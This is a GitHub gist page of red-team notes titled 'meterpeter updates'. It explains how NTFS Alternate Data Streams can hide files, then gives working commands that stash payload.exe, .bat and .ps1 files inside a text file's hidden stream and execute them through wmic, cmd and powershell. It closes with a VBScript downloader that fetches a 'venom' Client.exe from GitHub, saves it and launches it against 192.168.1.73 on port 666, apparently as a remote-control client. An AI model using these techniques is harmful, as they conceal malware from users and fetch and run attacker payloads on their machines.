-
-
Save r00t-3xp10it/e55c196e7ac9e5fc1eb8ea6a2feb0d65 to your computer and use it in GitHub Desktop.
meterpeter updates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
meterpeter new updates |
Alternate data streams (ADS)
What are Alternate Data Streams?
Alternate Data Streams (ADS) have been around since the introduction of windows NTFS. They were designed to provide
compatibility with the old Hierarchical File System (HFS) from Mac which uses something called resource forks.
Basically, ADS can be used to hide the presence of a secret or malicious file inside the file record of an innocent file. That is,
when windows shows you a file, say "readme.txt", the metadata that tells your system where to get "readme.txt" may also
contain information for "EvilSpyware.exe". Thus, malicious files may be on your system and you cannot see them using normal means.
How to see Alternate Data Streams records in CLI?
dir /r
Proof-Of-Concept
- Create one
text
file to be embebbed with onejpg image
echo test if it works > SSAredTeam.txt
type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg
- Delete kali-linux.jpg image
del kali-linux.jpg
- see ads
dir /r
- Execute kali-linux.jpg image
mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg
hidde mp3 in text file
- Create one
text
file to be embebbed with onemp3 file
echo test if it works > SSAredTeam.txt
- Append the
mp3 file
to thetext
file
type mysong.mp3 > SSAredTeam.txt:mysong.mp3
- Delete mysong mp3
del mysong.mp3
- see ads
dir /r
- Execute mysong.mp3 (ads)
wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3
hidde exe in text file
- Create one
text
file to be embebbed with oneexe file
echo test if it works > SSAredTeam.txt
- Append the
exe file
to thetext
file
type payload.exe > SSAredTeam.txt:payload.exe
- Delete payload exe
del payload.exe
- see ads
dir /r
- Execute payload.exe (ads)
wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"
- Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < SSAredTeam.txt:payload.bat
- Execute payload.ps1 stored in an Alternate Data Stream (ADS).
powershell .\SSAredTeam.txt:payload.ps1
Download files using VBS
' Set your url settings and the saving options
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
onelinner download
Download with VBS api